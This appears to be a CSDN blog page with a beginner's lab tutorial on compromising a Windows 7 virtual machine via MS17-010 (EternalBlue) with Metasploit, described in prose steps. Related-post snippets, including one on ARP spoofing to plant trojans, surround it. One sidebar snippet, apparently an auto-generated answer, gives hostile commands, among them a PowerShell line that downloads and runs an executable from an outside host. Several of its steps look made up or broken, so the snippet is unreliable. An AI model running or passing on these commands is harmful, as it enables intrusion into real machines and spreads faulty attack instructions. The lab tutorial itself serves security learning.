kali 2020 中用Metasploit利用MS17_010漏洞控制对方主机

最新推荐文章于 2024-05-06 17:44:19 发布
最新推荐文章于 2024-05-06 17:44:19 发布
阅读量1k 收藏 8
点赞数 1
文章标签: kali linux metasploit 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41179687/article/details/109756956
版权

kali 2020 中用Metasploit利用MS17_010漏洞控制对方主机

我也是刚学,把我学的发出来交流一下,一些地方写的不是太完美,多多指教!

准备环境:

VMware

攻击机:kali Linux2020    IP:192.168.33.129

目标机:Windowns7    IP:192.18.33.130

 

1、初始化数据库

2、启动msf

3、要利用Windows7存在的MS17_010漏洞,所以search搜索MS17_010。发现辅助模块auxiliary/scanner/smb/smb_ms17_010和利用模块exploit/windows/smb/ms17_010_eternalblue。

4、use使用auxiliary/scanner/smb/smb_m17_010探索目标机是否存在ms17_010漏洞。

5、show查看auxiliary/scanner/smb/smb_ms17_010设置选项。rhosts目标主机。

6、设置目标机地址192.168.33.130。run运行设置好的auxiliary/scanner/smb/smb_ms17_010。发现可能存在ms17_010漏洞。

7、使用exploit/windows/smb/ms17_010_eternalblue模块利用ms17_010漏洞。

show设置选项

8、设置目标机地址192.168.33.130。run运行exploit/windows/smb/ms17_010_eternalblue攻击。

运行成功后建立会话session 2,WIN表示攻击成功。

 

9、攻击成功后变为meterpreter,可直接执行一些命令。

whoami已取得system用户权限。

 

10、ctrl+z从cmd返回到meterpreter。

 

11、sysinfo查看系统信息。

12、bacground从meterpreter返回到msf。

 

13、sessions查看存在的session。

 

 

 

 

 

akz-47
关注
  • 1
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
局域网内得到另外电脑的桌面图像及简单的控制
03-08
局域网内得到另外电脑的桌面图像及简单的控制在MFC中实现
kali系统:局域网arp欺骗, 搞定任意windows计算机
weixin_33811539的博客
09-01 989
  目的   通过Arp欺骗, 给局域网内的所有用户网页中植入木马, 只要用户运行以后, 就会反弹一个shell到我们计算机   准备   kali系统   metaspolit的使用   Arp欺骗工具:bettercap   博客园账号密码(用来上传小马文件)   metaspolit小马的准备   因为我本地的ip为151, 溢出后反弹的端口为444, 使用msfvenom生...
渗透测试/metasploit控制目标电脑/ms17-010
dkpower111的博客
01-31 328
MSF msf是一款开源安全漏洞利用和测试工具,集成了各种平台常见的溢出漏洞和流行的shellcode,并保持持续更新 模块 auxiliary: 辅助模块,辅助渗透 exploits: 漏洞利用模块,包含主流漏洞利用脚本 payloads: 攻击载荷,主要是攻击成功后在目标机器执行的代码,比如反弹shell的代码 post: 后渗透阶段模块,漏洞利用成功获得meterpreter之后,向目标发送的一些功能性指令 encoders:编码器模块,主要包含各种编码工具,对payload进行编码加密,以便绕过入侵
Metasploit--MS17_010(永恒之蓝)
千寻的博客
02-18 489
文章目录MS17_010漏洞利用Auxiliary辅助探测模块介绍命令Exploit漏洞利用模块Payload攻击载荷模块介绍命令摘抄 MS17_010漏洞利用 msfconsole #进入metasploit框架 search ms17_010#寻找MS17_010漏洞 这里找到了两个模块: 第一个辅助模块是探测主机是否存在MS17_010漏洞, 第二个是漏洞利用模块,我们先探测哪些主机存在漏洞 Auxiliary辅助探测模块 介绍 该模块不会直接在攻击机和靶机之间建立访问 只负责执行扫描,嗅
AutoBlue-MS17-010:这是半自动的,完全正常工作,no-bs,非metasploit版本的MS17-010公共漏洞利用代码
02-06
MS17-010利用代码 这是一些no-bs公共漏洞利用代码,可以为永恒的蓝色漏洞利用生成有效的shellcode,并使用metasploit多处理程序编写事件侦听器的脚本。 此版本的漏洞利用程序以无需使用metasploit即可利用永恒蓝色的方式进行准备。 自动生成外壳的选项是使用具有meterpreter的msfvenom生成shellcode(即使用metasploit)或生成普通的Windows cmd shell(即不使用metasploit)。 如果希望避免完全利用msfconsole并使用netcat /您自己的shell处理程序,也可以在分段和无分段的有效负载之间进行选择。
永恒之蓝漏洞复现(ms17-010)
热门推荐
yy
01-20 2万+
Metasploit Framework(MSF)是一款开源安全漏洞检测工具,附带数千个已知的软件漏洞,并保持持续更新。Metasploit可以用来信息收集、漏洞探测、漏洞利用等渗透测试的全流程,被安全社区冠以“可以黑掉整个宇宙”之名。刚开始的Metasploit是采用Perl语言编写的,但是再后来的新版中,改成了用Ruby语言编写的了。在kali中,自带了Metasploit工具。
Metasploit简单利用及入侵Windows7案例.docx
11-13
Metasploit 入门---漏洞利用实验,攻击机系统:kali linux虚拟机。本文选择MS17_010漏洞(永恒之蓝)和MS08-067漏洞利用来尝试入侵Windows7虚拟机系统,目标机系统:Windows7 x64虚拟机。
python实验一 使用KALI进行MS17_010渗透提权
04-09
华东交通大学网络安全软件开发python实验一
KALI_LINUX_AN_ETHICAL_HACKERS_COOKBOOK.pdf
09-25
KALI_LINUX_AN_ETHICAL_HACKERS_COOKBOOK.pdf
kali-linux-wireless-pentest_kali_kalilinux_
10-04
Kali Linux 无线渗透测试入门指南
安全配置核查关注点
m0_62207482的博客
05-06 190
防火墙对UDP/TCP协议对外提供服务,供外部主机进行访问,如作为NTP服务器、TELNET服务器、TFTP服务器、FTP服务器、SSH服务器等,应配置防火墙,只允许特定主机访问。- 对于VPN用户,必须按照其访问权限不同而进行分组,并在访问控制规则中对该组的访问权限进行严格限制,检查口令生存周期要求。- 配置访问控制规则,拒绝对防火墙保护的系统中常见漏洞所对应端口或者服务的访问。- 查看每个共享文件夹的共享权限,只允许授权的账户拥有权限共享此文件夹。- 检查是否配置NFS服务限制检查。
合规基线:让安全大检查更顺利
a38417的博客
04-29 1079
德迅基线产品还支持自定义基线功能,企业可根据实际的使用场景,自行定义基线的检查项,如定义检查阈值、自定义检查目录、自定义检查结果展现模板、自定义检查项整改方案等,以满足企业多样化的内部监管要求。但是在有限的安全人员、参差不齐的安全技术水平面前,迫切需要能够辅助安全检查与自评估的自动化、标准化的基线检查工具,并且能够支持多种类型的主机、数据库、应用系统等安全基线信息的采集与检测工作。,进行实时安全核查,快速发现安全配置变化,一旦发生安全配置变更异常,以邮件方式进行安全告警。相对于其他同等产品优势,
网络安全实训Day16
Yisitelz的博客
04-26 2026
网络空间安全第16天学习笔记。漏洞扫描;内网渗透
Ftrans文件外发系统 构建安全可控文件外发流程
文件数据安全交换
04-29 846
飞驰云联是中国领先的数据安全传输解决方案提供商,长期专注于安全可控、性能卓越的数据传输技术和解决方案,公司产品和方案覆盖了跨网跨区域的数据安全交换、供应链数据安全传输、数据传输过程的防泄漏、FTP的增强和国产化替代、文件传输自动化和传输集成等各种数据传输场景。飞驰云联主要服务于集成电路半导体、先进制造、高科技、金融、政府机构等行业的中大型客户,现有客户超过500家,其中500强和上市企业150余家,覆盖终端用户超过40万,每年通过飞驰云联平台进行数据传输和保护的文件量达到4.4亿个。
Lianwei 安全周报|2024.05.06
最新发布
联蔚盘云的博客
05-06 396
新的一周又开始了,以下是本周「Lianwei周报」,我们总结推荐了本周的政策/标准/指南最新动态、热点资讯和安全事件,保证大家不错过本周的每一个重点!
大型语言模型安全风险的基准评估套件
lurenjia404的博客
05-06 515
CYBERSECEVAL 2 扩展了以前的工作,增加了两个新的测试套件:解释器滥用和提示注入。
IP路由安全:保护网络免受威胁
JAZJD的博客
04-29 1296
在当今互联的世界中,确保网络通信的安全至关重要。IP路由安全是网络安全的重要组成部分,它涉及保护通过 IP 网络传输的数据以及确保路由协议本身的安全。在本博客中,我们将探讨 IP 路由安全的主题,包括 IPv4 和 IPv6 协议的安全性分析、IPsec 的介绍,以及确保路由安全的最佳实践。发送方发送方根据 IP 数据包(包括标头)计算哈希值。哈希值和一些其他安全参数被添加到 AH 头中。IP 数据包被封装在 AH 头内,然后封装在外部 IP 头中。
kali利用ms17-010挂马
12-15
根据提供的引用内容,我们无法回答与网站挂马和文本输入相关的问题。关于kali利用ms17-010挂马的问题,我们需要先了解一下ms17-010是什么。ms17-010是指微软在2017年3月份发布的一个安全补丁,用于修复Windows操作系统中的SMBv1漏洞。攻击者可以利用漏洞远程执行代码,从而控制受感染的计算机。以下是kali利用ms17-010挂马的步骤: 1. 打开终端,输入以下命令更新kali系统: ```shell sudo apt-get update sudo apt-get upgrade ``` 2. 下载ms17-010漏洞利用工具,可以从GitHub上下载: ```shell git clone https://github.com/worawit/MS17-010.git ``` 3. 进入MS17-010目录,运行以下命令编译漏洞利用工具: ```shell cd MS17-010 make ``` 4. 执行以下命令,扫描目标主机是否存在SMBv1漏洞: ```shell ./send_and_execute 192.168.1.100 whoami.exe ``` 5. 如果目标主机存在SMBv1漏洞,执行以下命令,获取目标主机的Shell: ```shell ./eternalblue 192.168.1.100 shellcode.bin ``` 6. 执行以下命令,连接目标主机的Shell: ```shell nc 192.168.1.100 4444 ``` 7. 在目标主机的Shell中执行以下命令,下载并执行挂马程序: ```shell powershell -c "(new-object System.Net.WebClient).DownloadFile('http://www.trojan.com/1.exe','C:\Windows\Temp\1.exe');Start-Process 'C:\Windows\Temp\1.exe'" ``` 需要注意的是,上述步骤仅供学习和研究使用,请勿用于非法用途。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值